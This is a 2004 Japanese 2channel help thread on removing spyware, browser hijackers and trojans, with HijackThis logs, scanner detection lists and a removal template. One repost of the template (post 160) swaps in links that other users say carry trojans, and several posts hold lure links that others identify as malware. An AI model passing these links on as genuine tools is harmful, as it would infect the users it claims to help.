O9 - Extra button: Translate (HKLM)
O9 - Extra 'Tools' menuitem: Translator (HKLM)

99 :前スレの989:04/05/18 17:38 ID:1ARkZthQ
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
O16 - DPF: {4E330863-6A11-11D0-BFD8-006097237877} (InstallFromTheWeb ActiveX Control) - http://www.installfromtheweb.com/install/iftwclix.cab
O16 - DPF: {166B1BCA-3F9C-11CF-8075-444553540000} (Shockwave ActiveX Control) - http://download.macromedia.com/pub/shockwave/cabs/director/sw-intl.cab
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.com/CAB/x86/ansi/iuctl.CAB?38010.1407986111
O16 - DPF: {D24CD359-0000-0000-0000-000000000000} - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

100 :ひよこ名無しさん:04/05/18 17:56 ID:???
>>94
>>11のリンク先を踏んでしまった。
WEB SERCHという、サイトになりました。
下にHなリンク先の英語名がたくさんでてます
どうしてくれますか!!!

101 :前スレの989:04/05/18 18:02 ID:1ARkZthQ
O16 - DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} (QuickTime Object) - http://www.apple.com/qtactivex/qtplugin.cab


102 :前スレの989:04/05/18 18:05 ID:1ARkZthQ
O16 - DPF: {C7173F75-4426-4B86-B5F4-BA500BE66FE0} (ChainCast VMR Client Proxy)
O16 - DPF: {33564D57-0000-0010-8000-00AA00389B71}
O16 - DPF: {90C9629E-CD32-11D3-BBFB-00105A1F0D68} (InstallShield International Setup Player)
O16 - DPF: {0000000A-0000-0010-8000-00AA00389B71}


103 :前スレの989:04/05/18 18:08 ID:1ARkZthQ
以上です。
>>102は文字数のせいか書き込めなかったので、URLの部分は省略して記載しました。
なにか問題がありましたら、ご指摘お願いします。

>>100
申し訳ありません。
URL情報があったほうが、回答者の方も回答しやすいのではないかと思い貼ってしまいました。
「どうしてくれますか」とのことですが、現在私も解決方法が分からないので、お答えできません。
本当に申し訳ありませんでした。


104 :ひよこ名無しさん:04/05/18 18:39 ID:Nlauq93F
セーラー服に泥がついただけで、こんなに エロいとは……。
http://www.angelfire.com/bc3/jmakaya144/



105 :ひよこ名無しさん:04/05/18 19:00 ID:???

(((((((( ;゚Д゚)))))))ガクガクブルブルガタガタブルガタガクガクガクガクガク

106 :ひよこ名無しさん:04/05/18 19:16 ID:bdz6PtCo
>>90
ウチもまったく同じ症状かも。
理由はわからないけど、レジストリにHOMEOldSPとか
いうのが勝手に作られてしまう。
これを消しても、IEを立ち上げるとまたレジストリに
復活…何かスパイウェアを作るものがPC内にあるのかッ!?

107 :ひよこ名無しさん:04/05/18 19:37 ID:???
>>11のリンク先すげーな、ウィルスとスパイウェアの乱れうち。

108 :ひよこ名無しさん:04/05/18 19:58 ID:???
しかし今、Hijackthisのログを貼ってる2人供

不要なものはあるけど悪玉はないんだよね。

109 :ひよこ名無しさん:04/05/18 19:59 ID:???
>>108


110 :ひよこ名無しさん:04/05/18 20:05 ID:???
前スレの989タンと90タンのことだろ?

111 :ひよこ名無しさん:04/05/18 20:11 ID:???
>>11のとこ開けたらBlackICEがブロック

HTTP_Content_Type_HTA, 69.31.79.146, 1

[不正アクセスの試み] このシグネチャは、「application/hta」値と等しい
HTTP Content-Type ヘッダーを検出します。

112 :ひよこ名無しさん:04/05/18 20:13 ID:???
前々スレあたりからテンプレの後へ紛らわしいコピペを貼るアフォが出没
していたが、今回はせっかちな前スレ989に蹴散らされて10の下痢男コピペ
しか貼れなかったのはザマーミロw。亀レスだが、>>1スレ立て乙。

113 :ひよこ名無しさん:04/05/18 20:17 ID:???
>>112
ブラクラなの?

114 :ひよこ名無しさん:04/05/18 20:28 ID:???
前964はどうなった?

115 :ひよこ名無しさん:04/05/18 20:28 ID:4ZZCJDF6
なんかブラウザのタスクバーの法になんかsexだ野いろいろ書いてあるやつが出てきます
どうすればいいでしょう

116 :ひよこ名無しさん:04/05/18 20:30 ID:CJpfVwyX
あの
トレンドマイクロのオンラインスキャンで
Downloaded Program Filesフォルダ内にTROJ系のウィルスが検出されたのですが、
Downloaded Program Filesフォルダを開いてみても、
オンラインスキャンで検出されたファイルがありません。
どうすれば削除できるのでしょうか。

OSはWindowsMeです。
教えて偉い人

117 :ひよこ名無しさん:04/05/18 20:31 ID:???
>>115
どうしたいの?

118 :ひよこ名無しさん:04/05/18 20:32 ID:???
>>114
前964はネタだった。

119 :ひよこ名無しさん:04/05/18 20:32 ID:4ZZCJDF6
とりあえず削除したいです

120 :名無しさん@書き込み中:04/05/18 20:50 ID:???
ホームの設定しているのに起動すると違うサイトが一緒に
アドレスにでてきます。Ad-aware6をダウンロードして駆除しているの
ですが治りません。設定をリセットしても無理です。
どうすればいいのでしょう・・

121 :120 ◆.D7dxTtRKs :04/05/18 20:57 ID:???
テンプレ読んで実行したらなおりますた。
ありがとう。

122 :ひよこ名無しさん:04/05/18 20:58 ID:???
     ●【緊急】 早く治したい方は以下を実行して下さい 【処置】●

   WEB設定のリセットは、こまめに実行しましょう(無限ループ防止の為) 

1)  IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→
   プログラム→WEB設定のリセット

2) IEの履歴削除→ツール→インターネットオプション→全般→インターネット
   一時ファイル→クッキーの削除+ファイルの削除

3)  削除したいファイルがあるが「アクセスできません。使用中です」等といわれて
   削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動

4)  勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→
    アプリケーションの追加と削除(JWordはここでアンインストする)→OS再起動

5)  ブラウザジャッカーCoolWebSearch駆除ツール CoolWebShredderをDL
    http://higaitaisaku.web.infoseek.co.jp/removecws.html#jyokyo →OS再起動

6) 定番スパイウェア除去ソフト↓をインストール(併用推奨)

    ・定番 スパイウェア除去ソフト Ad-Aware 使用法
     http://www.dream-seed.com/server/spy.html
    ・定番 スパイウェア除去ソフト Spybot-S&D 使用法
     http://www.dream-seed.com/server/spybot.html

7) Me/XPの場合「システムの復元」で正常な状態に復帰させる方法もあります。
   [スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]
    →[システムの復元]

------以上実行してまだトラブってたら(OS種類必須)再度質問して下さい----

123 :名無しさん@書き込み中:04/05/18 20:58 ID:???
治ってないよ

124 :前スレの989:04/05/18 21:12 ID:1ARkZthQ
>>108
そうですか、Hijackthisには問題のあるエントリはないんですね。
ありがとうございます。


さきほど、Nortonでスキャンした結果、ウィルスは検出されませんでした。
ですが、IEのホームページが書き換えられるなどの障害が残ったままでしたので、念のためAntidoteでスキャンしてみました。

Antidoteでスキャンした結果、『ウィルス感染』と出たファイルが複数あるのですが、
これは手動で削除しても問題ないファイルなのでしょうか?
当該ファイルは下記に示しました。


6 C:\WINDOWS\mstaskss.exe = ウイルス感染 : TrojanDownloader.Win32.Donn.x
7 C:\WINDOWS\winupd.exe = ウイルス感染 : TrojanSpy.Win32.Banker.af
8 C:\WINDOWS\cmid32.dll = ウイルス感染 : TrojanSpy.Win32.Banker.ag
396 C:\Program Files\anonymail\anony\AnonyMail.exe = ウイルス感染 : Flooder.MailSpam.AnonMail.a
401 C:\RECYCLED\DC0.HTML = ウイルス感染 : TrojanDownloader.JS.Lamdez
402 C:\RECYCLED\DC1.HTML = ウイルス感染 : Trojan.Win32.Harnig.a
403 C:\RECYCLED\DC4.EXE = ウイルス感染 : Trojan.Win32.Harnig.b

以上です。
何卒、ご指導お願いします。


追伸。
問題のURLを貼ってしまったことで、大変ご迷惑をおかけしました。
本当にごめんなさい。

125 :ひよこ名無しさん:04/05/18 21:15 ID:???
>>124
NortonはUpdateしてんの?

126 :前スレの989:04/05/18 21:19 ID:1ARkZthQ
>>125
Nortonは感染後、体験版をDLして使用しています。
今までウィルスに対しては全くの無防備でした。

127 :ひよこ名無しさん:04/05/18 21:24 ID:???
ご注意

ウィルスは日々増加しており、シマンテックでは毎週一回以上ウィルス定義ファイル
(ワクチン)を更新しています。
トライアル版をインストール後必ず、ウィルス定義ファイルを更新してください。

128 :ひよこ名無しさん:04/05/18 21:25 ID:???
>126
updateっていうのはウイルス定義ファイルのことなんだが
本体があってもこれが古いと防御が弱い

129 :ひよこ名無しさん:04/05/18 21:26 ID:???
Antidoteはすごいんだな。

130 :前スレの989:04/05/18 21:30 ID:1ARkZthQ
>>128
無学ですいません・・・。
今調べてみたところ、
『ウィルス定義ファイルは最新です』
とのことでした。

131 :ひよこ名無しさん:04/05/18 21:45 ID:???
O4 - HKLM\..\Run: [SM Unplug] SMUnplug.exe 
これはググっても見つからない

132 :ひよこ名無しさん:04/05/18 21:49 ID:V/W9KvUT
SpybotかAd-Awareのどちらかで駆除していたところ、IE、explorer、My Computerが開けなくなってしまいました。
ウイルススキャンをしたり色々と手を尽くしましたが、どうにもなりません。メーカーのサポセンにも見放されました。
リカバリーしか方法はないのでしょうか?助けて下さい!ネタではありません。
OSは98、ブラウザは6.0です。


133 :ひよこ名無しさん:04/05/18 21:52 ID:???
>>131

SM Unplug はメルコのUSB HDの関連と思いますが。

134 :ひよこ名無しさん:04/05/18 21:53 ID:???
>>132
98はサポート終了

135 :前スレの989:04/05/18 21:56 ID:1ARkZthQ
>>131
>>133の方のご指摘通り、メルコのUSB HDを使用しております。

136 :ひよこ名無しさん:04/05/18 22:03 ID:???
とりあえず↓この2つは削除した方がいい。

C:\WINDOWS\mstaskss.exe

C:\WINDOWS\winupd.exe

mstaskss.exe の起動エントリがないのは妙だな。

137 :116:04/05/18 22:05 ID:CJpfVwyX
すいませんウィルスバスターをアップデートしたら隔離→削除できました。

138 :ひよこ名無しさん:04/05/18 22:08 ID:???
ヽ( ; ̄▽ ̄)ノ _中☆(>_< ) ピコンッ!

139 :ひよこ名無しさん:04/05/18 22:22 ID:Nlauq93F
初心者的ウィルス。ウィルスチェック機能を確認したい人におすすめ。
http://nise428.hp.infoseek.co.jp/cgi-bin/upload/img/1856.jpg


140 ::04/05/18 22:24 ID:c0vYT0sj
【ウホッ!】平井堅がFM生放送中、勢い余って「僕の彼は・・・」と発言【カミングアウト】
http://news10.2ch.net/test/read.cgi/news7/1084824781/l50
恋愛相談のコーナーで  すぐに「彼女は」と言い直すが
公式HPの掲示板は祭り状態!

141 :ひよこ名無しさん:04/05/18 22:28 ID:???
>>139
さっそく使ってますね(^0^)

142 :ひよこ名無しさん:04/05/18 22:40 ID:???
>>140
セブンの時点で見なくてもわかる

143 :ひよこ名無しさん:04/05/18 22:51 ID:Nlauq93F
これも。初心者ウィルスっていうか、カビの生えたウィルス。なぜ いまだに……。
http://www.angelfire.com/bc3/jmakaya144/


144 :ひよこ名無しさん:04/05/18 22:57 ID:???
自分が引っ掛かったヤツなんだろう。

145 :ひよこ名無しさん:04/05/18 22:58 ID:???
5個ウィルスが見つかった
ワーオ

146 :ひよこ名無しさん:04/05/18 23:02 ID:???
>>143
おまえ中学生だろ(^0^)

147 :ひよこ名無しさん:04/05/18 23:21 ID:???
>>143

もう駆除できたのかい?昨夜は悪かったな酔ってたんだ。

148 :ひよこ名無しさん:04/05/18 23:37 ID:Nlauq93F
>>147

よし許す

149 :前スレの989:04/05/18 23:50 ID:1ARkZthQ
>>136
ありがとうございます。

6 C:\WINDOWS\mstaskss.exe = ウイルス感染 : TrojanDownloader.Win32.Donn.x
7 C:\WINDOWS\winupd.exe = ウイルス感染 : TrojanSpy.Win32.Banker.af
8 C:\WINDOWS\cmid32.dll = ウイルス感染 : TrojanSpy.Win32.Banker.ag
396 C:\Program Files\anonymail\anony\AnonyMail.exe = ウイルス感染 : Flooder.MailSpam.AnonMail.a
401 C:\RECYCLED\DC0.HTML = ウイルス感染 : TrojanDownloader.JS.Lamdez
402 C:\RECYCLED\DC1.HTML = ウイルス感染 : Trojan.Win32.Harnig.a
403 C:\RECYCLED\DC4.EXE = ウイルス感染 : Trojan.Win32.Harnig.b

のうちご指摘頂いた、”6”と”7”は手動削除しました。

396については問題ないと思うのですがどうでしょう?
401〜403はごみ箱の中身でしたね。これももう問題ないと見ていいんでしょうか?

何度も何度もすいませんが、よろしくお願いします。

150 :ひよこ名無しさん:04/05/19 00:02 ID:Ipc+fsAj
>>139:スパイウエア+ウイルス
>>143:2ch半角かな板・同人スレ


151 :961:04/05/19 00:08 ID:???
>>前989

これFix
O8 - Extra context menu item: &iSearch The Web - res://C:\WINDOWS\SYSTEM\TOOLBAR.DLL/SEARCH.HTML

これは何ですか?わからなければFix
O4 - HKLM\..\Run: [SM Unplug] SMUnplug.exe

これは問題はないけど切り分けのためにFix、必要だったら治ってから戻せ
O4 - HKLM\..\Run: [eoneMng] C:\WINDOWS\eonemng.exe
O9 - Extra button: ReGet (HKLM)
O9 - Extra 'Tools' menuitem: &Re&Get (HKLM)
O9 - Extra button: ICQ (HKLM)
O9 - Extra 'Tools' menuitem: ICQ (HKLM)
O9 - Extra button: Translate (HKLM)
O9 - Extra 'Tools' menuitem: Translator (HKLM)

何のためにインストールしているかわからなければFix
O16 - DPF: {4E330863-6A11-11D0-BFD8-006097237877} (InstallFromTheWeb ActiveX Control) - http://www.installfromtheweb.com/install/iftwclix.cab
O16 - DPF: {C7173F75-4426-4B86-B5F4-BA500BE66FE0} (ChainCast VMR Client Proxy)
O16 - DPF: {90C9629E-CD32-11D3-BBFB-00105A1F0D68} (InstallShield International Setup Player)

152 :前スレの989:04/05/19 00:13 ID:+6p8SU7y
>>151
ありがとうございます。

O4 - HKLM\..\Run: [SM Unplug] SMUnplug.exe
は、>>133の方に指摘を頂いて分かったのですが、メルコのUSB HD関連のものみたいです。

上記以外のご指摘頂いたエントリはFixします。

153 :961:04/05/19 00:35 ID:???
そっかちゃんと読んでなかったw

98SEってまだWindowsUpdate対象なのか?
そうじゃなきゃ
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/current.asp
で必要なものを全てインストールしる!
緊急となってるものは98SEにあてられるかどうか全部チェック
今一番攻められているMS04-013はOE使ってなくても必須だ

次に何でもいいからPFWも入れてin・outは全て監視
これなら無料で日本語でデフォルト設定OKだ
http://download.zonelabs.com/bin/free/jp/index.html

それからFix後に>>3にある6)を全て最新状態に更新
ネット切断してから2)・3)を実行
6)の三種の神器は念のため通常とセーフモードで2回転くらい実行

んで調子が良いときにIE以外のブラウザも入れとけ

じゃ寝る

154 :前スレの989:04/05/19 01:47 ID:+6p8SU7y
>>153
度々ありがとうございます。
WindowsUpdateを試みたのですが、ファイルをDLするたびにフリーズしてしまい中々うまくいきません。

現在でも以下の障害が継続して起こっています。

1. IEのホームページがhttp://jksearch.biz/redir.phpに書き換えられる。
2. 特定のフォルダを開くと(マイドキュメント、マイコンピュータなど)フリーズする。
3. ファイルをDLするとフリーズする。
4. 起動時にexplorerが応答しない時がある。(ctrl+alt+delでexplorerを強制終了後、一応起動)


>>3の6)を実行中、Spypodで以下のウィルス(?)が検出されました。

DSO Exploit: Data source object exploit (レジストリ変更, fixed)
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3

CnsMin: Library (ファイル, fixing failed)
C:\WINDOWS\Downloaded Program Files\CnsMinSV.dll

CnsMin: Library (ファイル, fixing failed)
C:\WINDOWS\Downloaded Program Files\CnsMinEx.dll


皆さんのお陰で、問題のあるファイルは少しづつ減ってはいるようなのですが、
なかなか正常な状態には戻ってくれませんね。
私はPCについて詳しくないので、よくは分かりませんが、かなり根は深いような気がします・・・。

155 :ひよこ名無しさん:04/05/19 01:59 ID:???
はぁ、またスパイウェアに感染・・・・ 2回目です。 ホイホイクリックするもんじゃないね。

でもすぐに直せました。みんなも気をつけよう!

156 :前スレの989:04/05/19 02:17 ID:+6p8SU7y
>>153
紹介して頂いたPFW導入しました。
やはり、DL後フリーズしました・・・。

157 :ひよこ名無しさん:04/05/19 03:23 ID:???
前スレ989さんとよく似た状況のパソコンをいろいろいじってみて
分かったことを報告します。

障害内容は、(WindowsME)
1.IEのホームページが「jksearch.biz/redir.php」に書き換えられている。
2.デスクトップの壁紙がエロサイトのものになる。
3.壁紙を変えようとすると、IEが起動する。
壁紙は裏では変わるようだが、表面はエロサイトのまま。

いろいろ試した結果分かったことは、
1.「セーフモード」では問題ないが、「msconfigの診断用の起動」では、
壁紙はおかしくなる。
2.HijackthisのLogを、「セーフモード」と「msconfigの診断用の起動」で
比較すると、Running processesで、
C:\WINDOWS\SYSTEM\mmtask.tsk
C:\WINDOWS\SYSTEM.EXE
の2つが、「診断用の起動」の場合にだけ動いている。
3. C:\WINDOWS\SYSTEM.EXEのファイルは存在する。
また、削除しても、「診断用の起動」で立ち上げるとファイルが復活する。
4.regedit で C:\WINDOWS\SYSTEM.EXE を検索して削除しても変わらず。

Bootlogから「セーフモード」と「msconfigの診断用の起動」の違いをチェック
すれば見当がつくかと思いますが、どこが怪しいか誰か知りませんか?
教えて!エロい人!

158 :ひよこ名無しさん:04/05/19 04:12 ID:???
.壁紙を変えようとすると、IEが起動する・・・マジ

159 :ひよこ名無しさん:04/05/19 05:28 ID:???
( ´_ゝ`)フーン

160 :ひよこ名無しさん:04/05/19 10:05 ID:???
     ●【緊急】 早く治したい方は以下を実行して下さい 【処置】●

   WEB設定のリセットは、こまめに実行しましょう(無限ループ防止の為) 

1)IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→プログラム→WEB設定のリセット

2)IEの履歴削除→ツール→インターネットオプション→全般→インターネット一時ファイル→クッキーの削除+ファイルの削除

3)削除したいファイルがあるが「アクセスできません。使用中です」等といわれて削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動

4)勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→アプリケーションの追加と削除(JWordはここでアンインストする)→OS再起動

5)ブラウザジャッカーCoolWebSearch駆除ツール CoolWebShredderをDL
  http://users.hoops.ne.jp/ee94012/hayanet21st/index-1.htm  →OS再起動

6)定番スパイウェア除去ソフト↓をインストール(併用推奨)

 ・定番 スパイウェア除去ソフト Ad-Aware 使用法
  http://www.oct-net.ne.jp/~missile/altoegoh/r.htm
 ・定番 スパイウェア除去ソフト Spybot-S&D 使用法
  http://perso.wanadoo.es/lsmagsupermix1/

161 :ぼるじょあ ◆BORUJOARaA :04/05/19 10:45 ID:???
↑ (・3・) アルェー なんかあぼーんになってるYO


162 :ひよこ名無しさん:04/05/19 10:58 ID:EbbG26NA
>>160のURLはインチキ!
ウイルスが仕込んである!!!

163 : ◆VIRUSzXyeo :04/05/19 11:35 ID:???
>>160
TROJ_STARTPAGE_V
TROJ_SMALL_FO
BKDR_JEEMP.C
この辺のウィルスがいるみたいだね。有害。

164 :ひよこ名無しさん:04/05/19 11:46 ID:???
>>160
コイツ知らないでコピペしてるんじゃない?

165 :ひよこ名無しさん:04/05/19 13:06 ID:17PAXCRK
インターネットしていたらOSがおかしくなっちゃって
へんなサイトにとばされるように
で、「スタート」「設定」「コントロールパネル」を選択
「ネットワーク」をダブルクリックすると
その画面がでてはくれるんだけど0.1秒で消えちゃうの
だれかどうやったら直るのか教えてください!

166 :ひよこ名無しさん:04/05/19 13:07 ID:???
知らないわけないだろうに。
悪質だな・・・

167 :ひよこ名無しさん:04/05/19 13:21 ID:qCWsTtHR
>>165
0.1秒というか開いた瞬間、すぐ閉じるって感じだろ?
ウイルスとスパイウエアに感染してるよ、それ。
アンチウイルスソフトをまず買ってきなさい。

168 :ひよこ名無しさん:04/05/19 13:25 ID:17PAXCRK
ありがとうございます!

169 :ひよこ名無しさん:04/05/19 13:30 ID:JRPgPrmO
http://www.errorplace.com/
が出てきて困ってるんですけどどうにかならないんですかね?

170 :ひよこ名無しさん:04/05/19 13:31 ID:???
>>169
そのexe実行しちゃったのか?

171 :ひよこ名無しさん:04/05/19 13:35 ID:JRPgPrmO
いや、してないです。
エロスサイトに行くと勝手にエラーにされてここに飛ぶんです。

172 :ひよこ名無しさん:04/05/19 13:37 ID:???
>>171
とりあえずこのスレに書かれている事を実行してみて下さい

173 :ひよこ名無しさん:04/05/19 13:45 ID:qCWsTtHR
>>169のリンク先の
Please Click Hereの[Here]の部分は
クリックしないように。

174 :ひよこ名無しさん:04/05/19 13:49 ID:???
ttp://www.hi-results.com/
ttp://www.popuppers.com/

175 :ひよこ名無しさん:04/05/19 13:57 ID:???
if you would like to uninstall the errorpage redirecting engine

please click Here ←実行

176 :173:04/05/19 14:02 ID:qCWsTtHR
すまん>>169のリンク先の[Here]の部分は
アンイストールできるようだ・・・。
説明文を読むと、errorplaceをアンスコできる
みたいだが。それだと>>169の言うことがおかしく
なるな・・・?ワナか。

177 :ひよこ名無しさん:04/05/19 14:04 ID:???
>>176
そんな説明信用できるかよ
お前が実行して人柱になれ

178 :ひよこ名無しさん:04/05/19 14:05 ID:qCWsTtHR
>>174のリンク先もアンスコできますな・・・。
すまそorz
最近疑り深さに拍車がかかってきたなorz

179 :ひよこ名無しさん:04/05/19 14:09 ID:qCWsTtHR
>>177
インスコしてないし、やれねぇよ。
自己責任でとしか言えないな。
お前が踏んでみては?^^
では、消えます。

180 :ひよこ名無しさん:04/05/19 14:23 ID:???
PC初心者スレで誘導されてきました。
「WhenUSearch」というソフトが勝手にPCにインストールされたんですが、閉じる事も出来なくて削除できません。
このソフトを削除(もしくは破壊)したいんですが、どうしたらいいですか?


181 :ひよこ名無しさん:04/05/19 14:24 ID:???
>>180
とりあえずこのスレに書かれている事を実行してみて下さい
それでもダメならまた質問して下さい

182 :ひよこ名無しさん:04/05/19 14:28 ID:???
>>180
Symantec Security Response - Adware.WhenU
http://www.symantec.co.jp/region/jp/sarcj/data/a/adware.whenu.html

183 :ひよこ名無しさん:04/05/19 14:51 ID:6t1JXE4d
10分に一回くらいエロバナー広告が出てくるんですがどうやったらなくなりますか?どうか教えてくださいm(__)m

184 :ひよこ名無しさん:04/05/19 14:51 ID:???
>>183
とりあえずこのスレに書かれている事を実行してみて下さい

185 :ひよこ名無しさん:04/05/19 16:07 ID:???
便利な答えだなぁ(笑

186 :ひよこ名無しさん:04/05/19 16:08 ID:E0Epmtc6
ツールバーに「i Serch」というのが出てしまいました
表示→ツールバーもできない状態ですが、
どうすればいいのでしょうか

187 :ひよこ名無しさん:04/05/19 16:11 ID:???
>>186
とりあえず

綴り間違ってると思うよ

188 :ひよこ名無しさん:04/05/19 16:19 ID:???
>>186
iSearch Toolbar Removal Instructions
http://toolbar.isearch.com/uninstall/

189 :186:04/05/19 16:21 ID:E0Epmtc6
「i Search」ですよ_| ̄|○
すまそ

190 :ひよこ名無しさん:04/05/19 16:24 ID:???
>>183
たぶん、スパイウエァーがとり付いているから、
削除しようね。
そうしたら、OK牧場でつ。
あとは、フリーのスパイウエァでも、突っ込んで桶。
エロ サイト見るときは、ツールバーから
インターネットオプションを開いて
プライバシーを一番上まで持っていって、またーりと
楽しめyo・・ クッキーを取られないから。
立てこもりはいかんが
息子は立ってもよか。


191 :186:04/05/19 16:25 ID:E0Epmtc6
>>188さん
ありがとうございました

192 :ひよこ名無しさん:04/05/19 16:59 ID:hHFiSC1f
スパイボット使って削除しても、またポップアップがでてきちゃいます。
どうしたもんでしょうか?非常に困ってます・・・。

193 :ひよこ名無しさん:04/05/19 16:59 ID:???
>>192
諦めてリカバリ

194 :ひよこ名無しさん:04/05/19 17:04 ID:???
>>192
(´Д⊂ モウダメポ

195 :ひよこ名無しさん:04/05/19 17:06 ID:hHFiSC1f
>>193
最終手段ですか・・・_| ̄|○
何か策はないでしょうか?

196 :ぼるじょあ ◆yBEncckFOU :04/05/19 17:08 ID:???
>>195
(・3・) エェー ぶっちゃけちゃんと>>1から読んで実行してないから煽られてンだYO

197 :ひよこ名無しさん:04/05/19 17:09 ID:???
>>195
何を消してるかによるんでない?

198 :ひよこ名無しさん:04/05/19 17:10 ID:???
試そうともしない椰子はスッパリリカバリ!これが最善

199 :180:04/05/19 17:15 ID:???
>>181-182
解決できました。本当にありがとうございました。

200 :ひよこ名無しさん:04/05/19 17:24 ID:hHFiSC1f
>>197
消してるって??

201 :ひよこ名無しさん:04/05/19 17:32 ID:???
>>200
>>46

202 :ひよこ名無しさん:04/05/19 17:39 ID:???
>>200
>>198


203 :ひよこ名無しさん:04/05/19 17:45 ID:???
>>200
>>7

204 :ひよこ名無しさん:04/05/19 18:02 ID:???
(´・ω・`)

205 :ひよこ名無しさん:04/05/19 18:04 ID:RmTwpP1G
IEを開くと、エロページが自動的に開きます。
スパイボット使っても、IE開くたびに出てきます。
設定を変えても、ダメです。どうしたらいいでしょうか?

206 :ゴジラ ◆dIhHQcFy5M :04/05/19 18:07 ID:???
>>205
わかりません。
スタートアップかサービスに、レジストリの設定をしているプログラムが登録されているはずです。

207 :ひよこ名無しさん:04/05/19 18:16 ID:???
>>116 まず↓これを確認しろ

コントロールパネル→フォルダオプション→表示

「すべてのファイルとフォルダを表示する」
 にチェックが入っている

「登録されているファイルの拡張子は表示しない」
「保護されたオペレーティングシステムファイルを表示しない(推奨)」
 にチェックが入っていない

見つけたファイルが「使用中」で削除できない場合は
セーフモードで(F8連打してOSを)起動して削除→再起動

208 :207:04/05/19 18:17 ID:???
しまった。別のスレと間違って遠い過去へ呼びかけてしまったわい…

209 :ひよこ名無しさん:04/05/19 18:24 ID:???
《応急処置》
WEB見ててブラウザが変になったらとりあえず以下を実行。ブラクラ、ジョークソフト、
ブラウザジャッカー、スパイウェアなどの迷惑ソフトの8割はこれで撃退できますよん。

1) 閉じない窓を強制的に閉じる→alt+F4
2) IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→
  プログラム→WEB設定のリセット(作業中頻繁に実行してください。無限ループ防止)
3)IEの履歴削除→ツール→インターネットオプション→全般→インターネット
  一時ファイル→クッキーの削除+ファイルの削除
4) 削除したいファイルがあるが「アクセスできません。使用中です」とかいわれて
  削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動
5) 勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→
  アプリケーションの追加と削除(JWordはここでアンインストのこと)→OS再起動
6) 定番駆除ツールで駆除  a)→b)→c)の順に実行してください。
 a)CoolWebShredder 他のツールで駆除しにくいブラウザジャッカーCoolWebSearch
  専用の駆除ツールです。まずこれから実行。
  http://higaitaisaku.web.infoseek.co.jp/removecws.html#jyokyo 
  または本家 ttp://www.spywareinfo.com/~merijn/downloads.html→OS再起動
 b) Ad-Aware http://www.lavasoftusa.com/ (更新頻度高)
 c) Spybot-S&D http://www.safer-networking.org/ (強力だが更新頻度低)
8)Me/XPの場合「システムの復元」で直近の正常な状態に復帰させる、という手もアリ。
 [スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]
  →[システムの復元]

210 :名有りさん:04/05/19 18:28 ID:F4myQCNo
広告が勝手に出てきてしまうのですが、どうすれば治るでしょうか?
よろしくお願いします!



211 :ひよこ名無しさん:04/05/19 18:41 ID:???
>>210
落ち着いて>>1から読めば方法は書いてある。
その質問だとパソコンについての質問なのかどうかもわからん。


212 :ひよこ名無しさん:04/05/19 18:42 ID:???
>>210
>>209

213 :名有りさん:04/05/19 18:42 ID:F4myQCNo
いいかげんな質問ですみませんでした。
Advertising_Loading_WindowやWelcome to Ice Cold Stocksや
FreeeSearch.comやFree Horoscope!という広告のようなものが勝手に出てくるんです。
色々とためしたのですが‥‥効果的な治療方法(?)を教えてもらえないでしょうか??
よろしくお願いします。

214 :ひよこ名無しさん:04/05/19 18:44 ID:???
>>213
>>46

215 :名有りさん:04/05/19 18:45 ID:F4myQCNo
いいかげんな質問ですみませんでした。
Advertising_Loading_WindowやWelcome to Ice Cold Stocksや
FreeeSearch.comやFree Horoscope!という広告のようなものが勝手に出てくるんです。
色々とためしたのですが‥‥効果的な治療方法(?)を教えてもらえないでしょうか??
よろしくお願いします。

216 :ひよこ名無しさん:04/05/19 19:39 ID:C0Ie2wfG
Spybotをつかってスパイウェアを削除しようとしたんですができませんでした。
そのせいか何度直してもホームページがアダルトサイトになってしまいます。
どうしたら良いでしょうか教えてください

217 :ひよこ名無しさん:04/05/19 19:40 ID:H26pppSF
Hijackthisをしたのですがどれを削除していいかわかりません・・・。


218 :ひよこ名無しさん:04/05/19 19:49 ID:???
>>217
おまいの脳をjackしたわけだな

219 :ひよこ名無しさん:04/05/19 19:49 ID:???
テンプレ見ずに質問してしまいました。こんな私はどうしたら元に戻せるでしょうか?
教えてください、よろしくお願いします。

220 :ひよこ名無しさん:04/05/19 19:50 ID:???
>>219
もしもボックス

221 :ひよこ名無しさん:04/05/19 19:52 ID:???
>>219
このうそほんと

222 :ひよこ名無しさん:04/05/19 19:52 ID:11eAZ+cb
C:\WINDOWS\Fonts\fonts.hta は Trojan.StartPage に感染しています。
C:\Documents and Settings\Owner\Local Settings\Temp\Temporary Internet Files\Content.IE5\SXIFWLUB\testnewload[1].exe は Trojan.Mitglieder に感染しています。

スキャンしたところこう出ましたが、どうしたらよいのでしょうか?

223 :ひよこ名無しさん:04/05/19 19:53 ID:???
《応急処置》
WEB見ててブラウザが変になったらとりあえず以下を実行。ブラクラ、ジョークソフト、
ブラウザジャッカー、スパイウェアなどの迷惑ソフトの8割はこれで撃退できますよん。

1) 閉じない窓を強制的に閉じる→alt+F4
2) IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→
  プログラム→WEB設定のリセット(作業中頻繁に実行してください。無限ループ防止)
3)IEの履歴削除→ツール→インターネットオプション→全般→インターネット
  一時ファイル→クッキーの削除+ファイルの削除
4) 削除したいファイルがあるが「アクセスできません。使用中です」とかいわれて
  削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動
5) 勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→
  アプリケーションの追加と削除(JWordはここでアンインストのこと)→OS再起動
